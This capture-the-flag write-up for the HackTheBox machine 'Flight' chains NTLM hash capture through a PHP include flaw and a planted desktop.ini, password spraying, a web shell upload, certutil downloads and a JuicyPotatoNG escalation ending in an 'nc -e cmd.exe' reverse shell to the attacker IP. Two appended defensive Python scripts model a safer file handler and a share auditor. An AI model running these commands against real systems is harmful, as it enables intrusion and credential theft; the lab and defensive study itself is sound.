# [HackTheBox] Flight

![](https://i.imgur.com/vXpBdHO.png)

## Foothold

Checking which ports are open on the target:

```bash
nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49697/tcp open  unknown
49709/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds
```

Checking subdomains and subfolders:

```bash
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://flight.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school"
```

After finding the subdomain `school`, we continue enumerating the site with dirsearch.

```bash
dirsearch -u http://school.flight.htb

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt

Target: http://school.flight.htb/
```

But I noticed this:

![](https://i.imgur.com/xkfcrqB.png)

The `view` parameter in this URL looks like a candidate for LFI, so we test it with `../../../../etc/passwd` and get this result:

![](https://i.imgur.com/970WrHI.png)

To understand exactly how the filter works, we look at the source code of `index.php`:

```php
<?php
ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);

if(isset($_GET['view'])){
    $file=$_GET['view'];
    if ((strpos(urldecode($_GET['view']),'..')!==false)||
        (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
        (strpos(urldecode($_GET['view']),'\\')!==false)||
        (strpos(urldecode($_GET['view']),'htaccess')!==false)||
        (strpos(urldecode($_GET['view']),'.shtml')!==false)
    ){
        echo "<h1>Suspicious Activity Blocked!";
        echo "<h3>Incident will be reported</h3>\r\n";
    }else{
        echo file_get_contents($_GET['view']);
    }
}else{
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
?>
```

Bypassing this filter for a classic LFI looks hard: the checks on the URL-decoded value block `..`, `filter`, backslashes, `htaccess` and `.shtml`, so the path validation stops directory traversal. However, the value is still passed straight to `file_get_contents`, so we can make the service fetch a remote source written in Windows network share syntax, `//<ip>/<share>`. The web server then authenticates to our host, and we can capture the hash of the service account.

```bash
# Website:
http://school.flight.htb/index.php?view=//ip-attack/test

# Attacker's machine:
responder -I tun0 -wPv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.13]
    Responder IPv6             [dead:beef:4::100b]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-UJ4VMU7XFG1]
    Responder Domain Name      [R924.LOCAL]
    Responder DCE-RPC Port     [47241]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:90b54e5073440f[...]
```

Crack this hash with hashcat and get the result:

```bash
hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:[...]:S*******13
```

## Enum the SMB services

With the `svc_apache` credentials, we list the shares on the SMB service:

```bash
smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shared          Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
        Web             Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

## AD Enum

Enumerate the domain users over SMB with the credentials obtained above (`~/tools/cme/cme` or `crackmapexec`):

```bash
crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users
SMB         flight.htb      445    G0               flight.htb\O.Possum     badpwdcount: 0 desc: Helpdesk
SMB         flight.htb      445    G0               flight.htb\svc_apache   badpwdcount: 0 desc: Service Apache web
SMB         flight.htb      445    G0               flight.htb\V.Stevens    badpwdcount: 0 desc: Secretary
SMB         flight.htb      445    G0               flight.htb\D.Truff      badpwdcount: 0 desc: Project Manager
SMB         flight.htb      445    G0               flight.htb\I.Francis    badpwdcount: 0 desc: Nobody knows why he's here
SMB         flight.htb      445    G0               flight.htb\W.Walker     badpwdcount: 0 desc: Payroll officer
SMB         flight.htb      445    G0               flight.htb\C.Bum        badpwdcount: 1 desc: Senior Web Developer
SMB         flight.htb      445    G0               flight.htb\M.Gold       badpwdcount: 0 desc: Sysadmin
SMB         flight.htb      445    G0               flight.htb\L.Kein       badpwdcount: 0 desc: Penetration tester
SMB         flight.htb      445    G0               flight.htb\G.Lors       badpwdcount: 0 desc: Sales manager
SMB         flight.htb      445    G0               flight.htb\R.Cold       badpwdcount: 0 desc: HR Assistant
SMB         flight.htb      445    G0               flight.htb\S.Moon       badpwdcount: 0 desc: Junion Web Developer
```

Spraying the same password across the user list shows that `s.moon` reuses the password of `svc_apache`:

```bash
crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB         flight.htb      445    G0               [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [+] flight.htb\svc_apache:S*********3
SMB         flight.htb      445    G0               [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE
SMB         flight.htb      445    G0               [+] flight.htb\S.Moon:S*********3
```

## User: C.bum

Using impacket-psexec we can find out which share is writable. `Shared` is writable, but something on the host appears to block many file types from being written there, so the upload of the service binary fails:

```bash
impacket-psexec flight.htb/s.moon@g0.flight.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
```

Since we can still upload and modify files in `Shared`, I followed this post: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

```ini
[.ShellClassInfo]
IconResource=\\<ip>\test
```

After creating the `desktop.ini` file, we put it in the `Shared` folder over SMB:

```bash
smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
```

On the attacker's machine, Responder catches the authentication of whoever browses the folder:

```bash
responder -I tun0 -wPv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.13]
    Responder IPv6             [dead:beef:4::100b]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-W7Y6MWYR8I8]
    Responder Domain Name      [K8PD.LOCAL]
    Responder DCE-RPC Port     [46715]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:c69dd0be9d4ce77f[...]
```

Then we use hashcat to crack c.bum's password:

```bash
hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:[...]:T*************4
```

With this credential we can access the `Web` share over SMB:

```bash
smbclient //flight.htb/Web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
```

Then I upload p0wny-shell (https://github.com/flozz/p0wny-shell) into the `flight.htb` directory:

```bash
smb: \> ls
  .                                   D        0  Tue Dec 13 09:57:01 2022
  ..                                  D        0  Tue Dec 13 09:57:01 2022
  flight.htb                          D        0  Tue Dec 13 09:57:01 2022
  school.flight.htb                   D        0  Tue Dec 13 09:57:01 2022

                5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>
```

Then browse to the web shell and use a reverse shell payload from revshells.com to get a session:

![](https://i.imgur.com/zUBnbtC.png)

## C.bum Session

We have c.bum's credentials, so we switch the session to c.bum with `RunasCs` (https://github.com/antonioCoco/RunasCs/tree/master):

```bash
PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.
```

After that we can read `user.txt`.

## Privilege Escalation

From the shell as `svc_apache`, I check which ports are listening locally and find port `8000`, which is not reachable from outside. I forward it with chisel so I can interact with it from the attacker's machine:

```bash
PS C:\xampp\htdocs\flight.htb> netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             g0:0                   LISTENING
  TCP    0.0.0.0:88             g0:0                   LISTENING
  TCP    0.0.0.0:135            g0:0                   LISTENING
  TCP    0.0.0.0:389            g0:0                   LISTENING
  TCP    0.0.0.0:443            g0:0                   LISTENING
  TCP    0.0.0.0:445            g0:0                   LISTENING
  TCP    0.0.0.0:464            g0:0                   LISTENING
  TCP    0.0.0.0:593            g0:0                   LISTENING
  TCP    0.0.0.0:636            g0:0                   LISTENING
  TCP    0.0.0.0:3268           g0:0                   LISTENING
  TCP    0.0.0.0:3269           g0:0                   LISTENING
  TCP    0.0.0.0:5985           g0:0                   LISTENING
  TCP    0.0.0.0:8000           g0:0                   LISTENING
```

Pivoting the network with chisel:

```bash
# Client (on the target):
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000

# Server (on the attacker's machine):
chisel server --reverse -p 9999
```

Once connected to the website, I see it is written in ASP.NET, so I can try uploading an `.aspx` shell to get a reverse shell. The shell may be removed very quickly, so upload it somewhere else first and copy it into place when needed:

```bash
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
```

This gives us a reverse shell as `iis apppool\defaultapppool`:

![](https://i.imgur.com/KLasfgL.png)

## Administrator Enum

```bash
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

`SeImpersonatePrivilege` is enabled. Following this post on abusing tokens, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens, I choose JuicyPotatoNG (https://github.com/antonioCoco/JuicyPotatoNG) to escalate privileges on this machine.

I upload two files into `c:\users\c.bum\desktop`:

```bash
>certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
>certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe
```

Then grant permissions on both files so every user can run them:

```bash
>icacls nc.exe /grant Users:F
>icacls test.exe /grant Users:F
```

Back in the `iis apppool` session, we run it to get an Administrator shell:

```bash
c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"
```

Result:

![](https://i.imgur.com/J5ErEZ6.png)
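The foothold above rests on the `view` handler in `index.php` validating with a blocklist: it rejects a handful of substrings and hands anything else to `file_get_contents`, which is why a UNC path such as `//<ip>/<share>` sails through and makes the server authenticate outward. The following Python is an added example, not the box's code or the author's: it models the page's PHP checks as `blocklist_allows()` to show the gap, and beside it `resolve_view()` shows the allowlist-plus-containment check a developer should have used instead. The temporary web root, the file names and the `203.0.113.5` address are constructed for the demo.

```python
"""Added example (not the box's own code): the blocklist from index.php
modelled in Python next to an allowlist/realpath replacement for it.

Assumptions (not from the page): the web root is a temporary directory
created by demo(); the handler is modelled as a function that returns the
resolved file path (or None) instead of echoing file contents.
"""
import os
import re
import tempfile
from typing import Optional
from urllib.parse import unquote


def blocklist_allows(view: str) -> bool:
    """Model of the page's PHP checks: after URL-decoding, reject values that
    contain '..', a backslash, 'htaccess' or '.shtml', or 'filter' in any
    case. Everything else reaches file_get_contents, UNC paths included."""
    decoded = unquote(view)
    if any(token in decoded for token in ("..", "\\", "htaccess", ".shtml")):
        return False
    if "filter" in decoded.lower():
        return False
    return True


# Only a bare file name with an expected extension is acceptable. Slashes,
# drive letters, URL schemes and UNC prefixes all fail this pattern outright.
_SAFE_NAME = re.compile(r"\A[A-Za-z0-9_-]+\.(?:html|php)\Z")


def resolve_view(view: Optional[str], web_root: str) -> Optional[str]:
    """Allowlist replacement: accept only a bare file name, then require the
    resolved path to stay inside web_root and to exist as a regular file."""
    if not view:
        view = "home.html"          # same default as the page's handler
    if not _SAFE_NAME.match(view):
        return None
    root = os.path.realpath(web_root)
    path = os.path.realpath(os.path.join(root, view))
    # Second line of defence: containment check, in case the pattern is
    # ever loosened. commonpath raises ValueError for paths on different
    # drives on Windows; treat that as "outside the root" as well.
    try:
        if os.path.commonpath([root, path]) != root:
            return None
    except ValueError:
        return None
    if not os.path.isfile(path):
        return None
    return path


def demo() -> dict:
    """Run both checks against constructed inputs inside a temporary web root."""
    with tempfile.TemporaryDirectory() as web_root:
        with open(os.path.join(web_root, "home.html"), "w") as fh:
            fh.write("<h1>home</h1>")
        unc = "//203.0.113.5/test"  # constructed share path in the page's //<ip>/<share> form
        return {
            "blocklist_allows_unc": blocklist_allows(unc),              # True: the gap
            "blocklist_allows_traversal": blocklist_allows("../../../../etc/passwd"),
            "allowlist_unc": resolve_view(unc, web_root),              # None: rejected
            "allowlist_home": resolve_view("home.html", web_root) is not None,
            "allowlist_missing": resolve_view("nope.html", web_root),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point of the pattern check is that the input is never interpreted as a path until it has already been proven to be a plain file name; the `realpath` containment test is kept only as a backstop, because a blocklist of "bad substrings" can never enumerate every way a string can name something outside the intended directory.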
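The second credential theft relies on a writable share accepting a `desktop.ini` whose `IconResource` points at a UNC path, so that Explorer on any machine that browses the folder authenticates to that host. Below is an added example, not the box's tooling or the author's, showing how a defender can audit a share for that pattern: it walks a directory tree (a mounted share or an exported copy), parses each `desktop.ini`, and reports icon settings that reference a UNC target. The directory layout, file contents and the `203.0.113.5` address in `build_sample_share()` are constructed for the demo.

```python
"""Added example (not the box's own tooling): audit a share for desktop.ini
files whose icon settings point at a UNC path.

Assumptions (not from the page): the share is available as a local directory;
the sample tree built by build_sample_share() is constructed for the demo.
"""
import configparser
import os
import tempfile
from typing import Dict, List

# Keys under [.ShellClassInfo] that Explorer resolves as file paths.
ICON_KEYS = ("iconresource", "iconfile")


def _read_text(path: str) -> str:
    """desktop.ini files are often UTF-16 with a BOM; decode accordingly."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")


def find_unc_icons(text: str) -> List[str]:
    """Return the UNC targets referenced by desktop.ini text, or [] if none.
    Parse leniently: no interpolation, duplicate keys tolerated, and any
    file that is not INI-shaped simply yields no findings."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str.lower
    try:
        parser.read_string(text)
    except configparser.Error:
        return []
    findings = []
    for section in parser.sections():
        if section.lower() != ".shellclassinfo":
            continue
        for key, value in parser.items(section):
            value = value.strip()
            if key in ICON_KEYS and value.startswith(("\\\\", "//")):
                findings.append(value)
    return findings


def scan_share(root: str) -> Dict[str, List[str]]:
    """Walk root and map each offending desktop.ini (path relative to root)
    to the UNC targets it references."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() != "desktop.ini":
                continue
            full = os.path.join(dirpath, name)
            targets = find_unc_icons(_read_text(full))
            if targets:
                findings[os.path.relpath(full, root)] = targets
    return findings


def build_sample_share(root: str) -> None:
    """Constructed sample: one benign desktop.ini, one with a UNC IconResource,
    and one UTF-16 file using IconFile for the same trick."""
    os.makedirs(os.path.join(root, "Projects", "Q4"), exist_ok=True)
    with open(os.path.join(root, "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\SHELL32.dll,3\n")
    with open(os.path.join(root, "Projects", "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\nIconResource=\\\\203.0.113.5\\test\n")
    with open(os.path.join(root, "Projects", "Q4", "desktop.ini"), "wb") as fh:
        fh.write("[.ShellClassInfo]\r\nIconFile=\\\\203.0.113.5\\share\\icon.ico\r\n".encode("utf-16"))


def demo() -> Dict[str, List[str]]:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_share(root)
        return scan_share(root)


if __name__ == "__main__":
    for rel, targets in demo().items():
        print(f"{rel}: {', '.join(targets)}")
```

Run this periodically against shares that are writable by ordinary users, or hook it into whatever file-integrity process already watches them; a legitimate `desktop.ini` almost always references a local DLL or icon, so any UNC target is worth an alert, and the same check extends naturally to other Explorer-resolved keys such as `IconFile` shown here.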